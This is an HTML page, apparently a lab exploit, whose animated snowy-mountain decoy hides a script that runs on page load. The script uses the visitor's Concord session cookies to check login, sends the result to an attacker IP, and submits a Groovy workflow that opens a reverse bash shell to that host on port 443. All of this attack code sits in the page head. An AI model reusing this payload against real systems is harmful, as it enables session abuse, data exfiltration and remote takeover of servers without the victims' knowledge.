<html>
    <head>
        <script>
            yml = `
configuration:
  dependencies:
    - "mvn://org.codehaus.groovy:groovy-all:pom:2.5.8"

flows:
  default:
    - script: groovy
      body: |
         String host = "192.168.119.221";
         int port = 443;
         String cmd = "/bin/bash";
         Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
         Socket s = new Socket(host, port);
         InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
         OutputStream po = p.getOutputStream(), so = s.getOutputStream();
         while (!s.isClosed()) {
         while (pi.available() > 0) so.write(pi.read());
         while (pe.available() > 0) so.write(pe.read());
         while (si.available() > 0) po.write(si.read());
         so.flush();
         po.flush();
         Thread.sleep(50);
         try {
            p.exitValue();
            break;
         } catch (Exception e) {}
         };
         p.destroy();
         s.close();
`
            function rce() {
                var ymlBlob = new Blob([yml], { type: "application/yml" });
                var fd = new FormData();
                fd.append('concord.yml', ymlBlob);
                fetch("http://concord:8001/api/v1/process", {
                    credentials: 'include',
                    method:'POST',
                    body: fd
                })
                .then(response => response.text())
                .then(data => {
                    fetch("http://192.168.119.221/?msg=" + data )
                }).catch(err => {
                    fetch("http://192.168.119.221/?err=" + err )
                });
            }

            fetch("http://concord:8001/api/service/console/whoami", {
                credentials: 'include'
            })
            .then(async (response) => {
                if(response.status != 401){
                    let data = await response.text();
                    fetch("http://192.168.119.221/?msg=" + data )
                    rce()
                }else{
                    fetch("http://192.168.119.221/?msg=UserNotLoggedIn" )
                }
            })
        </script>
    </head>
    <body>
        <svg class="def" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
        viewBox="0 0 200 12.8">
     <defs>
       <linearGradient id="snow" gradientUnits="userSpaceOnUse" x1="100" y1="12.8333" x2="100" y2="3.899459e-08">
         <stop offset="0" style="stop-color:#C4CFD4"/>
         <stop offset="0.9" style="stop-color:#FFFFFF"/>
       </linearGradient>
     </defs>
     <path id="mountain" fill="url(#snow)" d="M6.3,6.4C9.5,4.7,16.8,5.6,19.8,5s3.9-2.6,6.3-2.2S28,4.6,30.3,4s4.3-3.1,7.2-2.9
                                              s24.7,7.2,32.8,6.6c11.9-0.8,5.7-2,20-4.5c13.1-2.4,21.6,1.2,26.5,0.7s9.2-5.1,14.7-3.6c7.7,2.1,16.7,4.9,25,6c6,0.7,7.5-3,10.3-4.3
                                              c3.1-1.3,1.4,5.9,13.3,1.7c9.3-3.3,11,0.9,12.9,3.3c1.5,2,7,5.8,7,5.8l-200,0C0,12.8,4.1,7.6,6.3,6.4z"/></path>
   </svg>
   <div class="bg">
     <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
          viewBox="0 0 200 12.8">
       <use x="0" y="0" xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mountain"></use>
     </svg>
   </div>
   <div class="bg">
     <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
          viewBox="0 0 200 12.8">
       <use x="0" y="0" xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mountain"></use>
     </svg>
   </div>
   <div class="snow back"></div>
   <div class="shadow"></div>
   <section class="yarni">
     <div class="head">
       <div class="eyes"></div>
     </div>
     <div class="body">
       <div class="hand left"></div>
       <div class="hand left wrist"></div>
       <div class="hand right"></div>
       <div class="hand right wrist"></div>
       <div class="leg left"></div>
       <div class="leg right"></div>
     </div>
   </section>
   <div class="snow front"></div>
    </body>
</html>
<style>
* {
  box-sizing: border-box;
}
body {
  margin: 0;
  padding: 0;
  background-color: #c4cfd4;
}
.def {
  position: absolute;
  width: 1px;
  height: 1px;
  visibility: hidden;
}
.snow {
  position: absolute;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
  background-image:  url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle opacity="0.5" fill="%23FFFFFF" cx="28.75" cy="22.338" r="0.713"/><circle opacity="0.2" fill="%23FFFFFF" cx="26.75" cy="79.443" r="0.307"/><circle opacity="0.5" fill="%23FFFFFF" cx="50" cy="41.884" r="0.308"/><circle fill="%23FFFFFF" cx="12.883" cy="42.25" r="0.367"/><circle opacity="0.4" fill="%23FFFFFF" cx="80" cy="72.818" r="0.307"/><circle opacity="0.5" fill="%23FFFFFF" cx="55.625" cy="12.375" r="0.308"/><circle opacity="0.2" fill="%23FFFFFF" cx="73.307" cy="89.375" r="0.308"/><circle opacity="0.5" fill="%23FFFFFF" cx="73" cy="53.884" r="0.308"/><circle opacity="0.5" fill="%23FFFFFF" cx="38.875" cy="89.432" r="0.385"/></svg>');
  background-size: 30rem 30rem;
  background-position: center 0;
  opacity: 0;
}
.snow.back {
  animation: snowBack 5s linear infinite;
}
.snow.front {
  animation: snowFront 5s 2s linear infinite;
}
.bg {
  position: absolute;
  top: 10rem;
  left: 0;
  right: 0;
  margin: auto;
  width: 80%;
  height: 5rem;
  opacity: 0.5;
}
.bg:nth-of-type(2) {
  top: 13rem;
  width: 60%;
  transform: rotateY(180deg);
}
.shadow {
  position: absolute;
  top: 12rem;
  left: 0;
  right: 0;
  margin: auto;
  width: 5rem;
  height: 5rem;
  border-radius: 50%;
  background-color: rgba(0, 0, 0, 0.05);
  transform: scaleY(0.1);
  transform-origin: center 100%;
}
.yarni {
  position: absolute;
  left: 0;
  right: 0;
  margin: 5rem;
  perspective: 4rem;
}
.head {
  position: relative;
  width: 4rem;
  height: 4rem;
  margin: 0 auto;
  z-index: 999;
  animation: yarniHeadTrill 0.2s infinite;
}
.head::before {
  display: block;
  width: 4rem;
  height: 4rem;
  border-radius: 50%;
  background-color: #da3f3c;
  transform: rotate(45deg);
  content: "";
  box-shadow: inset -1px -3px 2px rgba(0, 0, 0, 0.15);
}
.head::after {
  position: absolute;
  top: -2.25rem;
  display: block;
  width: 4rem;
  height: 4rem;
  border-radius: 40%;
  background-color: #c4cfd4;
  content: "";
}
.eyes {
  position: absolute;
  top: 1.75rem;
  width: 4rem;
  text-align: center;
}
.eyes::before {
  display: inline-block;
  width: 0.7rem;
  height: 0.7rem;
  border-radius: 50%;
  margin: 0.4rem;
  background-color: white;
  content: "";
  box-shadow: 0 0 5px rgba(0, 0, 0, 0.2), inset 0 0 5px rgba(0, 0, 0, 0.1);
  animation: eyesBlink 3s infinite;
}
.eyes::after {
  display: inline-block;
  width: 0.7rem;
  height: 0.7rem;
  border-radius: 50%;
  margin: 0.4rem;
  background-color: white;
  content: "";
  box-shadow: 0 0 5px rgba(0, 0, 0, 0.2), inset 0 0 5px rgba(0, 0, 0, 0.1);
  animation: eyesBlink 3s infinite;
}
.body {
  position: relative;
  width: 2rem;
  height: 8rem;
  margin: auto;
}
.body::before {
  position: relative;
  display: block;
  width: 1.75rem;
  height: 4.25rem;
  border-radius: 0.5rem;
  margin: -0.25rem auto 0;
  background-color: #da3f3c;
  transform: rotateX(15deg);
  transform-origin: 0 0;
  content: "";
  box-shadow: inset -2px 1px 5px rgba(0, 0, 0, 0.15);
  z-index: -999;
}
.hand.left {
  position: absolute;
  left: -0.25rem;
  top: 0;
  width: 0.5rem;
  height: 2rem;
  border-radius: 1rem;
  background-color: #da3f3c;
  transform: rotate(20deg);
  box-shadow: inset 0 -2px 2px rgba(0, 0, 0, 0.15);
}
.hand.left.wrist {
  position: absolute;
  top: 2.1rem;
  left: -0.4rem;
  transform: rotate(-110deg);
  box-shadow: inset 1px -2px 2px rgba(0, 0, 0, 0.15);
  transform-origin: 0 0;
  animation: yarniLeftHand 5s infinite;
}
.hand.right {
  position: absolute;
  right: -0.25rem;
  top: 0;
  width: 0.5rem;
  height: 2rem;
  border-radius: 1rem;
  background-color: #da3f3c;
  transform: rotate(-20deg);
  box-shadow: inset -1.5px -2px 2px rgba(0, 0, 0, 0.15);
}
.hand.right.wrist {
  position: absolute;
  top: 2rem;
  right: -0.4rem;
  transform: rotate(100deg);
  box-shadow: inset -1.5px -2px 3px rgba(0, 0, 0, 0.15);
  transform-origin: 100% 0;
  animation: yarniRightHand 5s infinite;
}
.leg.left {
  position: absolute;
  left: 0;
  top: 4rem;
  width: 0.5rem;
  height: 4rem;
  border-radius: 1rem;
  background-color: #da3f3c;
  transform: rotate(0deg);
  z-index: -99;
}
.leg.right {
  position: absolute;
  right: 0;
  top: 4rem;
  width: 0.5rem;
  height: 4rem;
  border-radius: 1rem;
  background-color: #da3f3c;
  transform: rotate(0deg);
  z-index: -99;
}
.leg::before {
  position: absolute;
  bottom: 0;
  width: 1rem;
  height: 0.5rem;
  border-radius: 0.5rem;
  background-color: #da3f3c;
  content: "";
  box-shadow: inset -2px -1px 2px rgba(0, 0, 0, 0.2);
}
@keyframes snowFront {
  0% { background-position: 0rem 0rem; opacity: 0}
  50% { background-position: -2.5rem 15rem; opacity: 1}
  100% { background-position: -5rem 30rem; opacity: 0}
}
@keyframes snowBack {
  0% { background-position: 0rem 0rem; opacity: 0}
  50% { background-position: 2.5rem 15rem; opacity: 1}
  100% { background-position: 5rem 30rem; opacity: 0}
}
@keyframes yarniHeadTrill {
  0% {transform: translate(0);}
  30% {transform: translate(0.03rem, -0.1rem);}
  60% {transform: translate(-0.03rem, -0.1rem);}
  100% {transform: translate(0);}
}
@keyframes yarniLeftHand {
  0%, 20% {transform: rotate(-110deg)}
  25% {transform: rotate(-120deg)}
  35% {transform: rotate(-110deg)}
  45% {transform: rotate(-130deg)}
  50%, 100% {transform: rotate(-110deg)}
}
@keyframes yarniRightHand {
  0%, 20% {transform: rotate(100deg)}
  27% {transform: rotate(110deg)}
  37% {transform: rotate(90deg)}
  47% {transform: rotate(110deg)}
  52%, 100% {transform: rotate(100deg)}
}
@keyframes eyesBlink {
    50% {transform: scaleY(0.7)}
}
</style>
